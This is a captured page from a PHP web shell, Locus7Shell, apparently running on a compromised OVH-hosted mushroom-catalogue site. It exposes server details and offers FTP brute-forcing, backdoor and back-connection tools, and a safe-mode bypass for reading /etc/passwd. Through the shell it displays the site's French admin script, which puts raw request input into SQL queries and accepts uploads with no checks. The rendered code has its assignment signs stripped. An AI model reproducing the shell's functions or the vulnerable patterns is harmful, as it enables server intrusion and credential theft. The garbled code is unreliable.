Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/   drwx---r-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     Modification articles.php (18.04 KB)      -rw----r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//connection à la database
include ("connect.php");
$date date("Y-m-d");
if (isset($_SESSION['identifiant']))
 {
  $user $_SESSION['identifiant'];

   if ($user)
    {
     
       if (isset($_GET['creation']))
        { 
        }
        else
        {
          echo "<table width='540' border='0' cellspacing='0' cellpadding='0'>
                 <tr>
                 <td  valign='bottom'>
                 <br><span class='Style6'>Suppression d'un champignon</span>
                 </td>
                 <td valign='bottom'><div align='right'>
                 </div></td>
                 </tr>
                 </table><p>";
         }   
           
       if (isset($_GET['creation']))
        {
         $creation $_GET['creation'];
         if ($creation==2)
          {
           if (isset($_POST['crea']))
            {
            //récuperer le fichier envoyé
            $cat $_POST['Genres'];
           $cat2 $_POST['Especes'];
           $cat3 $_POST['Subdivision'];
          $title $_POST['nom'];
         $title2 $_POST['nom'];
          $title $cat." ".$cat2." ".$cat3." ".$title;
          $name1 $_FILES['myfile1']['name'];
          $size1 $_FILES['myfile1']['size']; //voir le tutorial upload pour vérifier que c'est une image
      $tmp_name1 $_FILES['myfile1']['tmp_name'];
          $name2 $_FILES['myfile2']['name'];
          $size2 $_FILES['myfile2']['size']; //voir le tutorial upload pour vérifier que c'est une image
      $tmp_name2 $_FILES['myfile2']['tmp_name'];
          $name3 $_FILES['myfile3']['name'];
          $size3 $_FILES['myfile3']['size']; //voir le tutorial upload pour vérifier que c'est une image
      $tmp_name3 $_FILES['myfile3']['tmp_name'];
          $name4 $_FILES['myfile4']['name'];
          $size4 $_FILES['myfile4']['size']; //voir le tutorial upload pour vérifier que c'est une image
      $tmp_name4 $_FILES['myfile4']['tmp_name'];
          $name5 $_FILES['myfile5']['name'];
          $size5 $_FILES['myfile5']['size']; //voir le tutorial upload pour vérifier que c'est une image
      $tmp_name5 $_FILES['myfile5']['tmp_name'];
          $name6 $_FILES['myfile6']['name'];
          $size6 $_FILES['myfile6']['size']; //voir le tutorial upload pour vérifier que c'est une image
      $tmp_name6 $_FILES['myfile6']['tmp_name'];
      
      // transformer les ids en nom
      
         $get mysql_query("SELECT * FROM espece WHERE ID='$cat2'");
            while ($row mysql_fetch_assoc($get))
             {
              // obtenir données
              $bcat2 $row['ESPECE'];
              
              }
              
         $get mysql_query("SELECT * FROM genre WHERE ID='$cat'");
            while ($row mysql_fetch_assoc($get))
             {
              // obtenir données
              $bcat $row['GENRE'];
              
              }
              
         $get mysql_query("SELECT * FROM subdivision WHERE ID='$cat3'");
            while ($row mysql_fetch_assoc($get))
             {
              // obtenir données
              $bcat3 $row['SUBDIVISION'];
              
              }

             if ($name1)
              {
              //Chargement en cours(on commence par configurer la photo (3 lignes)
              $title strtr($title'ÁÀÂÄÃÅÇÉÈÊËÍÏÎÌÑÓÒÔÖÕÚÙÛÜÝ''AAAAAACEEEEEIIIINOOOOOUUUUY');
              $title strtr($title'áàâäãåçéèêëíìîïñóòôöõúùûüýÿ/''aaaaaaceeeeiiiinooooouuuuyy_');
              $location1 ="pdf1/".$title.".pdf";
              $emplacement1 ="pdf1/";

              $location1 ="pdf1/$title.pdf";
              move_uploaded_file($tmp_name1,$location1); //regarder le tutorial pour que personne ne puisse y installer des fichier!!!
              }
             else{
              $location1 ="";
              }
              
              if ($name2)
              {
              //Chargement en cours(on commence par configurer la photo (3 lignes)
              $title strtr($title'ÁÀÂÄÃÅÇÉÈÊËÍÏÎÌÑÓÒÔÖÕÚÙÛÜÝ''AAAAAACEEEEEIIIINOOOOOUUUUY');
              $title strtr($title'áàâäãåçéèêëíìîïñóòôöõúùûüýÿ/''aaaaaaceeeeiiiinooooouuuuyy_');
              $location2 ="pdf2/".$title.".pdf";
              $emplacement2 ="pdf2/";

              $location2 ="pdf2/$title.pdf";
              move_uploaded_file($tmp_name2,$location2); //regarder le tutorial pour que personne ne puisse y installer des fichier!!!
              }
             else{
              $location2 ="";
              }
              
              if ($name3)
              {
              //Chargement en cours(on commence par configurer la photo (3 lignes)
              $title strtr($title'ÁÀÂÄÃÅÇÉÈÊËÍÏÎÌÑÓÒÔÖÕÚÙÛÜÝ''AAAAAACEEEEEIIIINOOOOOUUUUY');
              $title strtr($title'áàâäãåçéèêëíìîïñóòôöõúùûüýÿ/''aaaaaaceeeeiiiinooooouuuuyy_');
              $location3 ="pdf3/".$title.".pdf";
              $emplacement3 ="pdf3/";

              $location3 ="pdf3/$title.pdf";
              move_uploaded_file($tmp_name3,$location3); //regarder le tutorial pour que personne ne puisse y installer des fichier!!!
              }
             else{
              $location3 ="";
              }
              
              if ($name4)
              {
              //Chargement en cours(on commence par configurer la photo (3 lignes)
              $title strtr($title'ÁÀÂÄÃÅÇÉÈÊËÍÏÎÌÑÓÒÔÖÕÚÙÛÜÝ''AAAAAACEEEEEIIIINOOOOOUUUUY');
              $title strtr($title'áàâäãåçéèêëíìîïñóòôöõúùûüýÿ/''aaaaaaceeeeiiiinooooouuuuyy_');
              $location4 ="pdf4/".$title.".pdf";
              $emplacement4 ="pdf4/";

              $location4 ="pdf4/$title.pdf";
              move_uploaded_file($tmp_name4,$location4); //regarder le tutorial pour que personne ne puisse y installer des fichier!!!
              }
             else{
              $location4 ="";
              }
              
              if ($name5)
              {
              //Chargement en cours(on commence par configurer la photo (3 lignes)
              $title strtr($title'ÁÀÂÄÃÅÇÉÈÊËÍÏÎÌÑÓÒÔÖÕÚÙÛÜÝ''AAAAAACEEEEEIIIINOOOOOUUUUY');
              $title strtr($title'áàâäãåçéèêëíìîïñóòôöõúùûüýÿ/''aaaaaaceeeeiiiinooooouuuuyy_');
              $location5 ="pdf5/".$title.".pdf";
              $emplacement5 ="pdf5/";

              $location5 ="pdf5/$title.pdf";
              move_uploaded_file($tmp_name5,$location5); //regarder le tutorial pour que personne ne puisse y installer des fichier!!!
              }
             else{
              $location5 ="";
              }
              
              if ($name6)
              {
              //Chargement en cours(on commence par configurer la photo (3 lignes)
              $title strtr($title'ÁÀÂÄÃÅÇÉÈÊËÍÏÎÌÑÓÒÔÖÕÚÙÛÜÝ''AAAAAACEEEEEIIIINOOOOOUUUUY');
              $title strtr($title'áàâäãåçéèêëíìîïñóòôöõúùûüýÿ/''aaaaaaceeeeiiiinooooouuuuyy_');
              $location6 ="pdf6/".$title.".pdf";
              $emplacement6 ="pdf6/";

              $location6 ="pdf6/$title.pdf";
              move_uploaded_file($tmp_name6,$location6); //regarder le tutorial pour que personne ne puisse y installer des fichier!!!
              }
             else{
              $location6 ="";
              }
              
              
              $query mysql_query("INSERT INTO champignons VALUES ('','$bcat','$bcat2','$title2','$bcat3','$date','','$location1','$location2','$location3','$location4','$location5','$location6')");
      
              echo("<br><span class='Style5'>Le nouvel article est maintenant enregistré <a href='index.php?page=Member'>Retour</a></span><br>");

            }

          }
           else
          {
          //formulaire de creation d'articles
          echo"<table width='500' border='0' cellspacing='0' cellpadding='0'>
           <tr>
            <td>
          <form action='index.php?page=Modification articles&creation=2' method='POST' enctype='multipart/form-data'>
          <br><span class='Style5'>
          <span class='Style6'>Création d'un article</span><p>
           
           <table width='400' border='0' cellspacing='0' cellpadding='0'>
           <tr>
            <td>Variété:<br><img src='image/transparent.png' width='140' height='1' /></td>
            <td><input type='text' name='nom'><br>
                <img src='image/transparent.png' width='30' height='4' /></td>
           </tr>
           <tr>
            <td>Categorie: </td>
            <td>
                    <select name='Genres'>
                   <option value=''>----- Genres -----</option>";
              $get mysql_query('SELECT * FROM genre ORDER BY genre');
              while ($row mysql_fetch_assoc($get))
                   {
                    $cat $row['GENRE'];
                    $idcat $row['ID'];
                    echo "<option value=".$idcat.">".$cat."</option>";
                    }       
                     echo "</select>
                    <br>
                    <select name='Especes'>
                   <option value=''>----- Especes -----</option>";
              $get mysql_query('SELECT * FROM espece ORDER BY espece');
              while ($row mysql_fetch_assoc($get))
                   {
                    $cat $row['ESPECE'];
                    $idcat $row['ID'];
                    echo "<option value=".$idcat.">".$cat."</option>";
                    }       
                     echo "</select><br>
                    <select name='Subdivision'>
                   <option value=''>----- Sub-division -----</option>";
              $get mysql_query('SELECT * FROM subdivision ORDER BY subdivision');
              while ($row mysql_fetch_assoc($get))
                   {
                    $cat $row['SUBDIVISION'];
                    $idcat $row['ID'];
                    echo "<option value=".$idcat.">".$cat."</option>";
                    }       
                     echo '</select>
                <br><img src="image/transparent.png" width="30" height="4" /></td>
           </tr>
           <tr>
            <td>PDF Rouge: </td>
            <td><input type="file" name="myfile1"><br>
                <img src="image/transparent.png" width="30" height="4" /></td>
           </tr>
           <tr>
            <td>PDF Jaune: </td>
            <td><input type="file" name="myfile2"><br>
                <img src="image/transparent.png" width="30" height="4" /></td>
           </tr>
           <tr>
            <td>PDF Orange: </td>
            <td><input type="file" name="myfile3"><br>
                <img src="image/transparent.png" width="30" height="4" /></td>
           </tr>
           <tr>
            <td>PDF Cyan: </td>
            <td><input type="file" name="myfile4"><br>
                <img src="image/transparent.png" width="30" height="4" /></td>
           </tr>
           <tr>
            <td>PDF Violet: </td>
            <td><input type="file" name="myfile5"><br>
                <img src="image/transparent.png" width="30" height="4" /></td>
           </tr>
           <tr>
            <td>PDF Bleu: </td>
            <td><input type="file" name="myfile6"><br>
                <img src="image/transparent.png" width="30" height="4" /></td>
           </tr>
           <tr>
           <td></td>
           <td><input type="submit" name="crea" value="Confirmer la création"></td>
           </tr>
           </table>
           </span><p>
           </form>
           </td>
           <td align="center" valign="top">
           <img src="image/transparent.png" width="20" height="20" border="0" />
           ';
                    if (isset($_GET['ajout1']))
                    {
                    echo" <form action='index.php?page=Modification articles&creation=1&add1=1' method='POST' enctype='multipart/form-data'>
                    <table><tr><td><input name='newgenre' type='text' value='' maxlength='40' /></td><td>
                    <input type='submit' name='sup' value='Ajouter'></td></tr></table>
                    </form>";
                    }
                    else
                    {
                    if (isset($_GET['add1']))
                    {
                    $newgenre $_POST['newgenre'];
                    $query mysql_query("INSERT INTO genre VALUES ('','$newgenre')");
                    echo "Ajout réussi
                    <META HTTP-EQUIV='Refresh' CONTENT='0;URL=index.php?page=Modification articles&creation=1'>";
                    }
                    else
                    {
                    echo" <form action='index.php?page=Modification articles&creation=1&ajout1=1' method='POST' enctype='multipart/form-data'>
                    <input type='submit' name='sup2' value='Ajouter un Genre'>
                    </form>";
                    }
                    }

                    if (isset($_GET['ajout2']))
                    {
                    echo" <form action='index.php?page=Modification articles&creation=1&add2=1' method='POST' enctype='multipart/form-data'>
                    <table><tr><td><input name='newespece' type='text' value='' maxlength='40' /></td><td>
                    <input type='submit' name='sup' value='Ajouter'></td></tr></table>
                    </form>";
                    }
                    else
                    {
                    if (isset($_GET['add2']))
                    {
                    $newespece $_POST['newespece'];
                    $query mysql_query("INSERT INTO espece VALUES ('','$newespece')");
                    echo "Ajout réussi
                    <META HTTP-EQUIV='Refresh' CONTENT='0;URL=index.php?page=Modification articles&creation=1'>";
                    }
                    else
                    {
                    echo" <form action='index.php?page=Modification articles&creation=1&ajout2=1' method='POST' enctype='multipart/form-data'>
                    <input type='submit' name='sup2' value='Ajouter une Espece'>
                    </form>";
                    }
                    }
                    
                    if (isset($_GET['ajout3']))
                    {
                    echo" <form action='index.php?page=Modification articles&creation=1&add3=1' method='POST' enctype='multipart/form-data'>
                    <table><tr><td><input name='newsubdivision' type='text' value='' maxlength='40' /></td><td>
                    <input type='submit' name='sup' value='Ajouter'></td></tr></table>
                    </form>";
                    }
                    else
                    {
                    if (isset($_GET['add3']))
                    {
                    $newsubdivision $_POST['newsubdivision'];
                    $query mysql_query("INSERT INTO subdivision VALUES ('','$newsubdivision')");
                    echo "Ajout réussi
                    <META HTTP-EQUIV='Refresh' CONTENT='0;URL=index.php?page=Modification articles&creation=1'>";
                    }
                    else
                    {
                    echo" <form action='index.php?page=Modification articles&creation=1&ajout3=1' method='POST' enctype='multipart/form-data'>
                    <input type='submit' name='sup2' value='Ajouter une Sub-division'>
                    </form>";
                    }
                    }
                            
                    echo
           
           </td>
           </tr></table>
           ';
         }
        
        
        }
        else
        {}   
           

       if (isset($_GET['id']))
        {
         $id $_GET['id'];
 
           if (isset($_GET['supprimer']))
            {
             $get mysql_query("SELECT * FROM champignons WHERE ID='$id'");
                   while ($row mysql_fetch_assoc($get))
                    {
                     // obtenir données
                       $genre $row['GENRE'];
                      $espece $row['ESPECE'];
                      $variete $row['VARIETE'];
                      $subdivision $row['SUBDIVISION'];
                      $title $genre." ".$espece." ".$subdivision." ".$variete;
                      }
                      
             $supprimer $_GET['supprimer'];
               if ($supprimer==2)
                {
                 $query mysql_query("DELETE FROM champignons WHERE ID='$id'");
                  echo ("La variété ".$title." n'existe maintenant plus. <a href='index.php?page=Alpha'><strong>Retour</strong></a><br>");
                }
               else
                {
                 echo "<form action='index.php?page=Modification articles&id=".$id."&supprimer=2' method='POST' enctype='multipart/form-data'>
                 Confirmer la suppression de \"".$title."\"
                 <input type='submit' name='sup' value='Supprimer'>
                 </form>";
                }

           }
          else
           {
             if (isset($_POST['submit']))
               {
                //récuperer le fichier envoyé
                $name $_FILES['myfile']['name'];
                $size $_FILES['myfile']['size']; //voir le tutorial upload pour vérifier que c'est une image
                $tmp_name $_FILES['myfile']['tmp_name'];

                  if ($name)
                   {
                    //Chargement en cours
                    $choix2 $choix;
                    $choix2 strtr($choix2'ÁÀÂÄÃÅÇÉÈÊËÍÏÎÌÑÓÒÔÖÕÚÙÛÜÝ''AAAAAACEEEEEIIIINOOOOOUUUUY');
                    $choix2 strtr($choix2'áàâäãåçéèêëíìîïñóòôöõúùûüýÿ/''aaaaaaceeeeiiiinooooouuuuyy_');
                    $location ="photo_article/".$choix2.".png";
                    $emplacement ="photo_article/";
                    $cat $choix;
                    $cat2 $choix2;
                    
                    include ("Enregistrement.php");                    
              
                    $location ="photo_article/$choix2.png";
                    move_uploaded_file($tmp_name,$location); //regarder le tutorial pour que personne ne puisse y installer des fichier!!!
                    $query mysql_query("UPDATE articles SET LA_PHOTO='$location' , DATE_MODIF='$date' WHERE NOM='$choix'");
      
                    echo("L'image est maintenant enregistré <a href='index.php?page=Member'>Retour</a><br>");
                   }
                  else
                     echo("Sélectionner un fichier!");
                }
               else
                {
                  echo "<span class='Style5'>Mettre à jour la photo: \"".$choix."\"<br>
                  <img src='image/transparent.png' width='30' height='4' /><br>
                  <form action='index.php?page=Modification articles&choix=".$choix."' method='POST' enctype='multipart/form-data'>
                  Fichier: <input type='file' name='myfile'> <input type='submit' name='submit' value='Charger'><span>
                  </form>";
                 }

            }
           echo '</span>';

        }
       else
        {}
    
    if (isset($_POST['select']))
     {
      $selection $_POST['nomrecherche'];
     }
     else
     {
      $selection "12345";
     }
    //apparition des données
    $get mysql_query("SELECT * FROM champignons WHERE VARIETE LIKE '%$selection%'");
    echo '<table>';
    while ($row mysql_fetch_assoc($get))
          {
           // obtenir données
           $genre $row['GENRE'];
          $espece $row['ESPECE'];
         $variete $row['VARIETE'];
     $subdivision $row['SUBDIVISION'];

            
          echo"
          <tr background='image/fond70.png'>
    <td><span class='Style2'><strong>".$genre." ".$variete."</strong></span></td>
  </tr>
  <tr background='image/fond70.png'>
    <td background='image/fond70.png'><span class='Style4'><a href='index.php?page=Article&choix=".$variete."'>Modifier</a> | <a href='index.php?page=Modification articles&supprimer=1&choix=".$variete."'>Supprimer</a></span></td>
  </tr>
  <tr>
    <td><img src='image/transparent.png' width='600' height='10' /></td>
  </tr>
          
          
          
          ";
           }
          echo " </table>
        </p>";
   }
  else
    echo("Vous devez être connecté."); 
 }
else
    echo("Vous devez être connecté.");  
?>

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 
Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0063 ]--